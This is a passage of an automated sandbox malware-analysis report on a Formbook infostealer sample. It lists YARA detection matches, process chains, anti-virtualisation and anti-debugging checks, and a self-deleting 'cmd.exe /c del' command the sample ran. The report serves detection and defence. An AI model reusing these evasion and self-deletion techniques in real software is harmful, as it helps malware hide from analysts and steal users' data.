          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/8
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB978.tmpJump to behavior
          Source: PQMW0W5h3X.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: PQMW0W5h3X.exeVirustotal: Detection: 17%
          Source: PQMW0W5h3X.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile read: C:\Users\user\Desktop\PQMW0W5h3X.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PQMW0W5h3X.exe, 00000000.00000003.330363976.00000000097A0000.00000004.00000001.sdmp, PQMW0W5h3X.exe, 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PQMW0W5h3X.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeUnpacked PE file: 2.2.PQMW0W5h3X.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_100029F0 push eax; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004062F6 pushfd ; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004153FC push eax; retf
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00415CE7 pushad ; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00414D71 push ss; iretd
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00415D38 pushad ; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A5D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004062F6 pushfd ; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004153FC push eax; retf
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00415CE7 pushad ; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041C4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0460D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C062F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C153FC push eax; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C15CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1C4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B47C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B412 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B41B push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C14D71 push ss; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C15D38 pushad ; ret
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002C085F4 second address: 0000000002C085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002C0898E second address: 0000000002C08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6540Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.352759648.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.352726758.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.349159526.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.352726758.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.353071310.0000000008540000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA-
          Source: explorer.exe, 00000003.00000000.349159526.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.353264391.0000000008674000.00000004.00000001.sdmpBinary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
          Source: explorer.exe, 00000003.00000000.352620265.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.352620265.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.352759648.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.337441844.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
